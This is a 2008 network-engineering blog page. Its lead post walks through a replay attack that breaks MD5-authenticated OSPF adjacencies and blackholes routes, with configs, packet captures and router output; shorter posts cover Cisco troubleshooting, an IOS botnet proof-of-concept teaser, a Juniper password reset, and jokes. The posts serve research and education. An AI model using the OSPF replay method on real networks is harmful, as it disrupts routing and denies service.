Well, do you think your routing protocols are secure when you enable neighbor cryptography MAC (Message Authentication Code) ?
Hahahaha! At the end of the article, I wish your vision will turnover!
In this article I will show you how to break OSPF adjacencies on an Ethernet segment with cryptography checks enabled. In many litteratures (like Cisco hacking exposed book), the workaround to OSPF flaws is to enable MD5 authentication. In the first attack (majority of this article) we will blackhole OSPF routes learned by a md5ized victim router. The second attack is not very interesting (Like 2 lines in the end of the article). My testbed is 2 Cisco routers (2500 and 2600) and 1 GNU/Linux Debian.
Assuming this, let’s see what happens when we break the stuff.
Step zero: Example of an IOS configuration that I’ll break:
interface Ethernet0
ip address 192.168.0.101 255.255.255.0
no ip directed-broadcast
no ip route-cache
ip ospf authentication message-digest
ip ospf authentication-key cisco
ip ospf message-digest-key 1 md5 cisco
router ospf 1
router-id 192.168.0.101
network 172.16.0.1 0.0.0.0 area 0
network 192.168.0.101 0.0.0.0 area 0
network 192.168.1.1 0.0.0.0 area 0
network 192.168.1.5 0.0.0.0 area 0
network 192.168.4.1 0.0.0.0 area 0
First step but the harder (in a production network). But it would not be so hard if you are good at Social Engineering. You have to kill OSPF adjacencies to get a hello message with an empty neighbor list (active neighbor in wireshark).
As you may known, OSPF crypto is applied on OSPF header, hello and other OSPF messages EXCEPT on IP header. So ask you the following question which seems simple at first sight. How to breaka connection between 2 hosts ? Basically the Ethernet killer guy should say : Let’s go hacking ARP and sends 192.168.0.100 packets to 192.168.0.101 redirected to a blackhole!! (with the ettercap isolate plugin by example) Well, It could works if packets exchanges were between those two hosts. But OSPF works with Multicast (224.0.0.5) so an ARP attack will not works. So how can we do in order to make Snowy’s thinking that Tintin is dead and fortunately clear the OSPF adjacency between themselves ? humm, sadly I haven’t find a better way to break the connection with unplug the RJ45 ;) Trying to hack IP layer within our OSPF packet will be useless as our goal is to get a valid and processed IP layer and the OSPF payload even if it’s not incorporated in the OSPF MAC algorithm. Anyway, why focus on OSPF hello packet as an interface can eat a lot of valid/malformed attacks^wpackets ? Keep in head that your goal is to reset the interface which receives OSPF packets: “There is more than one way to do it”.
Hello packet when bidirectional communication has already been established:
OSPF Hello Packet
Network Mask: 255.255.255.0
Hello Interval: 10 seconds
Options: 0×02 (E)
0… …. = DN: DN-bit is NOT set
.0.. …. = O: O-bit is NOT set
..0. …. = DC: Demand circuits are NOT supported
…0 …. = L: The packet does NOT contain LLS data block
…. 0… = NP: Nssa is NOT supported
…. .0.. = MC: NOT multicast capable
…. ..1. = E: ExternalRoutingCapability
Router Priority: 1
Router Dead Interval: 40 seconds
Designated Router: 192.168.0.101
Backup Designated Router: 192.168.0.100
Active Neighbor: 192.168.0.101
Second step: Wait for the dead interval (which is 40 seconds by default). While capturing, wait for the next packet after the dead interval: The Tintin’s router (192.168.0.101) should be no more present in the active neighbor list. Nice, you’ve captured the OSPF killer packet!
Notice in the following packet that 192.168.0.101 no more present in Active neighbor field nor in the DR/BDR elected routers.
OSPF Hello Packet
Network Mask: 255.255.255.0
Hello Interval: 10 seconds
Options: 0×02 (E)
0… …. = DN: DN-bit is NOT set
.0.. …. = O: O-bit is NOT set
..0. …. = DC: Demand circuits are NOT supported
…0 …. = L: The packet does NOT contain LLS data block
…. 0… = NP: Nssa is NOT supported
…. .0.. = MC: NOT multicast capable
…. ..1. = E: ExternalRoutingCapability
Router Priority: 1
Router Dead Interval: 40 seconds
Designated Router: 192.168.0.100 (.101 was the DR)
Backup Designated Router: 0.0.0.0
In the IOS debug command we got this message (ourself is 192.168.0.101):
06:18:36: OSPF: Cannot see ourself in hello from 192.168.0.100 on Ethernet0, state INIT
In the best scenario, you should capture the OSPF hello packet when it had a high authentication cryptography sequence number (like 0×48ac79cb) and before it rollover to 0×0. Replay the unique packet on the network then observe OSPF neighbor adjacencies:
BEFORE #sh ip ospf neighbor
Neighbor ID Pri State Dead Time Address Interface
192.168.0.100 1 FULL/DROTHER 00:00:31 192.168.0.100 Ethernet0
192.168.0.1 1 FULL/DR 00:00:34 192.168.0.1 Ethernet0
AFTER #sh ip ospf neighbors
Neighbor ID Pri State Dead Time Address Interface
192.168.0.100 1 INIT/DROTHER 00:00:39 192.168.0.100 Ethernet0
192.168.0.1 1 FULL/DR 00:00:35 192.168.0.1 Ethernet0
There is two things to notice. First, the dead timer is refreshed each time the router receive our packet. It means that the neighbor router isn’t flagged like DOWN but stille active and ready to exchange DBD (Database Descriptors) packets but will never go into the 2WAY state which requires bidirectional communication. Our attack deny this happening. Secondly the STATE of the adjacency. 192.168.0.100 is now stuck in the INIT state. We observe that we lost routes learned from OSPF routing process from 192.168.0.100 :
192.168.4.0/30 is subnetted, 1 subnets
C 192.168.4.0 is directly connected, Loopback2
192.168.7.0/32 is subnetted, 1 subnets
O 192.168.7.1 [110/11] via 192.168.0.1, 00:00:45, Ethernet0 (We haven’t attacked the 192.168.0.1 router)
C 192.168.0.0/24 is directly connected, Ethernet0
192.168.1.0/30 is subnetted, 2 subnets
C 192.168.1.0 is directly connected, Loopback0
C 192.168.1.4 is directly connected, Loopback1
Then when we stopped the attack adjacencies becomes OK in a few seconds until the next true HELLO packet get processed by the OSPF Hello process :
#sh ip os neighbor
Neighbor ID Pri State Dead Time Address Interface
192.168.0.100 1 FULL/DROTHER 00:00:38 192.168.0.100 Ethernet0
192.168.0.1 1 FULL/DR 00:00:36 192.168.0.1 Ethernet0
perhaps you are asking you if the attack use a lot of CPU ? The answer is no. Look the show process cpu output by yourself :
2 29944 18069 1657 1.80% 1.12% 0.43% 0 OSPF Hello
And show memory summary give us 2kbytes of memory (7 blocks aka approximately 7 arrays of 312 chars) :
0×33868A2 312 7 2184 OSPF Hello
Secure yourself from these threats :
The pello’s tricky method: Frequently changes your router ID.
It will end like this until the hacker capture a fresh OSPF neighbor DOWN event :
Neighbor ID Pri State Dead Time Address Interface
192.168.0.100 1 INIT/DROTHER 00:00:39 192.168.0.100 Ethernet0
192.168.5.1 1 FULL/DROTHER 00:00:38 192.168.0.100 Ethernet0
192.168.0.1 1 FULL/DR 00:00:29 192.168.0.1 Ethernet0
And OSPF from 192.168.0.100’s router still in the global IP routing table :
192.168.4.0/30 is subnetted, 1 subnets
C 192.168.4.0 is directly connected, Loopback2
192.168.5.0/32 is subnetted, 1 subnets
O 192.168.5.1 [110/11] via 192.168.0.100, 02:10:05, Ethernet0
192.168.7.0/32 is subnetted, 1 subnets
O 192.168.7.1 [110/11] via 192.168.0.1, 02:10:05, Ethernet0
C 192.168.0.0/24 is directly connected, Ethernet0
192.168.1.0/30 is subnetted, 2 subnets
C 192.168.1.0 is directly connected, Loopback0
C 192.168.1.4 is directly connected, Loopback1
The second attack in OSPF with cryptography enabled is the ability to replay any OSPF packet in the hello timer frame window because the authentication cryptography sequence number is incremented each 10 seconds (default hello timer). It could lead to a DoS attack.
août 20th, 2008
If you want don’t want to see your TFTP file transfer looking like 259bytes/second between Cisco ASA and your Windows XP workstation, don’t forget to close Virtual PC machine.
Today I initiated a TFTP file transfer from a freshly out-of-the-box Cisco ASA and a Solarwinds TFTP server hosted on a Windows XP workstation. Traffic was very very slow. Show interfaces reported 5 minute output rate 0 pkts/sec, 259 bytes/sec
So what the fuck? I was very skeptical on this issue .. Ran Wireshark and no interface was available except generic dialup. And here comes the idea in my brain: I’m running Debian in Virtual PC. No IT can’t be ?? Yes, don’t blame the network so early in your troubleshooting steps.. VPC was the root problem :)
Click here to see the TFTP transfer speed changing over time !
Wanna dream of QoS rate limiting without adding a unique line of configuration ? Run Virtual PC!
août 19th, 2008
When a networking geek find a new feature, he’d love to implement it on his network perimeter (Perhaps Benmoon will read my article).
But, sometimes, the super feature is not applicable on all sort of production networks.
That’s the case for the L2PT (Layer 2 protocol tunneling) feature which is especially useful for VPLS (aka virtual lan services based on Ethernet) service provider customers. Cisco doc is not very clear and poor about the usage of L2PT feature but CCIE hackers use it. The feature’s goal is to widen the layer 2 network of multiple geographic remote sites over WAN. I’ll try to add another dimension in the understanding of this feature.
First thing to know: when you hear L2TP you must think “big switch” or “big trunk” in Cisco terminology.
Second thing to know: L2TP do Spanning-tree, CDP and Vlans tunnels (+Pagp,lacp,udld).
Third thing to know: It do nothing except giving the possibility to extend the Layer 2 domain size.
Why do I need a big switch ?
Increasing Layer 2 domain size between Paris, London and Sidney :
- Single bridge domain (one VLAN)
- Single subnet
- Single SLA
- MAC address learning and forwarding
To do this working over a WAN, L2PT is mandatory.
Guys, I have a Wacom tablet so I’ll definitely try to use it for this article. Like I used to say to my students, it’s best effort drawing ;-)
L2PT big picture over a MPLS/VPLS backbone :
A switch as a CE (Customer Edge) ?
It’s not because it’s a Layer 2 stuff that a switch is absolutely required. You can have a switch and/or a router aka a stuff who can do 802.1Q tunneling.
Who configure the L2PT in IOS ?
L2PT will be configured on the ISP equipments (commands borrowed from packetlife). These lines need to be typed on the backbone routers where CDP,STP and VLANs frames will flow until reaching another customer’s site.
interface GigabitEthernet0/1
l2protocol-tunnel cdp
l2protocol-tunnel stp
l2protocol-tunnel vtp
no cdp enable
Limitations of L2PT
Don’t forget the MAC address limits, VLAN numbers limit which will require PBT (Provider Bridging Transport) or H-VPLS (Hierarchical VPLS) in order to work and break L2PT. Also, in the good to know part, please keep in mind that a virtual switch will operate like a conventional switch considering flooding/forwarding, MAC learning/aging, loop prevention in Unicast, Broadcast and Multicast environments, so always keep an open eye on your layer 2 perimeters (not the part owned by the ISP).
L2TP should only be used with small customer implementations.
And security ?
One thing is sure.. these technologies open massive leaking holes on the network security field. I will name the use of redundant multihoming connections (Local traffic may be tunneled to the service provider backbone) and misfit in Vlans number: Imagine Vlan10 in the Sidney site is the wifi hotspot vlan and Vlan10 in Paris is the database’s customers one.
août 16th, 2008
Strange behavior in the pipe! Welcome!
I was working on a bug PoC glad to an old fashion 2611 router when the problem begins: Packets can’t reach their destination from and to an ethernet sub-interface with the physical interface UP and without IP address.
I do ping 192.168.0.23 which is linked to ethernet0/0 by a cross-over cable.
CDP can be exchanged as it’s layer 2 and use of the physical interface.
I’ve tested too with the 2611 linked to a 2500 router and to a 2900 switch.
Same behavior : I can’t ping from and to the sub-interface (192.168.0.100).
And of course, it works like a charm when I setup it with the physical interface.
Do you know a mystic trick to do this working except use other hardware or use dynamips linked to the host computer interface ?
Anyway, I really need to use the subif else my bug PoC should not be viable :)
Show commands output:
hacking2600#sh ip int brief
*Mar 1 00:07:43.848: %SYS-5-CONFIG_I: Configured from console by console
Interface IP-Address OK? Method Status Prot
ocol
Ethernet0/0 unassigned YES manual up up
Ethernet0/0.1 192.168.0.100 YES manual up up
sh run
interface Ethernet0/0
no ip address
full-duplex
!
interface Ethernet0/0.1
encapsulation dot1Q 1 native
ip address 192.168.0.100 255.255.0.0
!
When I try ping, debug ip packet said “encapsulation failed”.
There is nothing special in wireshark: The PC responds to the ICMP requests but looks like the router drop the stuff.
Tried with 2 different versions of ios.
Don’t get fucked by the the network mask.
Debug ip packet details output :
*Mar 1 00:44:38.907: IP: tableid=0, s=192.168.0.100 (local), d=192.168.0.23 (E
thernet0/0.1), routed via RIB
*Mar 1 00:44:38.907: IP: s=192.168.0.100 (local), d=192.168.0.23 (Ethernet0/0.
1), len 100, sending
*Mar 1 00:44:38.907: ICMP type=8, code=0
*Mar 1 00:44:38.907: IP: s=192.168.0.100 (local), d=192.168.0.23 (Ethernet0/0.
1), len 100, encapsulation failed
*Mar 1 00:44:38.911: ICMP type=8, code=0.
Success rate is 0 percent (0/5)
hacking2600#
*Mar 1 00:44:44.112: IP: s=192.168.0.100 (local), d=224.0.0.5 (Ethernet0/0.1),
len 64, sending broad/multicast, proto=89
août 16th, 2008
In this funny video (yeah I like FBI even if I don’t know them), I will show you my IOS botnet proof of woot.
It’s for real but I don’t want to be a security pr0nstar showing my 4ss at conferences nor taking the time to make a perfect proof of concept that everyone in the IT security field dreams about at least a time in his career. Just take some fun with computer glad to my poor programming skills in TCL.
So yeah, I’ve hacked 127.0.0.1 in order to leak my old hard disk for you.
Why now ?
- IOS stuff is breaking news since some months so the most stupid human can understand what I did (or not)
- Holidays, I would like less people see this in order to stop blargz about this and mitigated since long time by Cisco
- I’m clear with Cisco about it and helped the R&D to reproduce the proof of concept
- Definitely not 0-day!
Click here to join #lol
Pète un coup et ça ira mieux …
août 14th, 2008
From logs I learn the last time I boot on my Juniper JunOS Olive vmware was 1 year ago.
Not surprisingly I forgot my password.
I tried password recovery official methods and other stuff from Google which leaded to an epic FAIL.
Well you know, Olive is just a hack. Gladly Freebsd and UNIX commands are inside and today is a creativity day :)
Here’s my unofficial method to recover the root password if you are really really stuck:
fsck /dev/ad0s1e
mount -o rw /dev/ad0s1e /config
gunzip juniper.conf.gz
mv juniper.conf juniper.orig
cat -b juniper.orig
export NEWROOTPWD=”plain-text-password \”root\”;”
sed “4s/.*/ ${NEWROOTPWD}/g” juniper.orig >> juniper.conf
gzip juniper.conf
rm juniper.orig
cd /
umount /dev/ad0s1e
reboot
hura! Your console access is back!
août 14th, 2008
Are you looking for bandwidth or latency stress tools ?
I’ll don’t tell you to look at Spirent or breakingPoint cuz it cost tons of bucks.
Here is a list of free tools under Windows, Linux and BSD:
- iperf - tcp/udp/multicast - http://sourceforge.net/projects/iperf/
- tfgen - UDP - http://www.st.rim.or.jp/~yumo/pub/tfgen.html
- netcps - http://www.netchain.com/netcps/
- PCAUSA test tcp - http://www.pcausa.com/Utilities/ttcpdown1.htm
- OpenWebLoad - http://openwebload.sourceforge.net/
- Sipp - SIP voice signalization protocol - http://sipp.sourceforge.net/
- DPT - DNS protocol - Win32 - Linux - MacOSX
- TXDNS - multithreaded DNS testing - Win32
- tcpbench - tcp benchmarking and measurement - inside OpenBSD
- Ixia Qcheck - http://www.ixiacom.com/products/performance_applications/pa_display.php?skey=qcheck - Submitted by Joe
Feel free to add a comment in order to complete the list!
juillet 30th, 2008
This morning when I opened my mail inbox, I found this gem and it’s too late for april’s fool :
From: K…. P….. (k…….)
Sent: mardi 29 juillet 2008 22:09
To: blarg-obfuscated (mailer list)
Subject: Reset router
I cannot log into to my router. What is the command to reset the router to factory default?
–
K…. P….., CISSP, CISA, GSNA, ITIL
Sr Systems Engineer
Security/ Compliance Specialist
Cisco Systems Inc.
13600 Dulles Technology Drive
Herndon Va 20171
Direct 7.. … ….
Mobile 7.. … ….
http://www.cisco.com/go/security
juillet 30th, 2008
Irina from Cisco Moscow told me yesterday I am funny. Well, Windows XP is too.
Telnet.exe dislikes cat /dev/mem in socat :-/
Click here to view the Windows XP telnet.exe bug
juillet 28th, 2008
Il faudrait être déconnecté d’Internet, en vacances en Corse ou formateur à SUPINFO, être trop occupé à coder un exploit SMTP qui va rooter toute la planète ou encore travailler chez un ISP pour ne pas avoir entendu parler du buzz de l’été: Dan Kaminsky, Paul Vixie et DNS.
L’Internet étant déjà bien pollué … et histoire de se démarquer des bloggeurs sur la faille DNS qui racontent tous la même chose. Pourquoi pas réaliser une série de ta mère sur le DNS ?
- Ta mère elle a tellement oublié son cerveau en se réveillant qu’elle croit encore qu’il y a 13 serveurs physiques DNS racines
- Ta mère a tellement de l’espoir qu’elle dit partout que AAAA c’est l’avenir
- Ta mère y compris tellement rien dans son archi réseau qu’elle ose pas patcher BIND
- Ta mère est tellement open qu’elle met en cache powned.doxpara.com
- Ta mère est tellement moche que Dan ose pas la bruteforcer
- Ta mère elle a tellement rien à foutre qu’elle a le temps de lire la RFC 2181
- Ta mère c’est tellement une pigeonne qu’elle croit encore qu’on peut déployer DNSSEC en 6 minutes
-
Ta mère elle veut tellement devenir une star qu’elle fuzz les RR additionnels cet été
- Ta mère elle est tellement parano qu’elle dig son macbook pro sous MAC OsX
- Ta mère elle a tellement lu l’autobiographe de Théo qu’elle croit que le BIND de son OpenBSD est safe
Ouais!
juillet 24th, 2008
Previous Posts
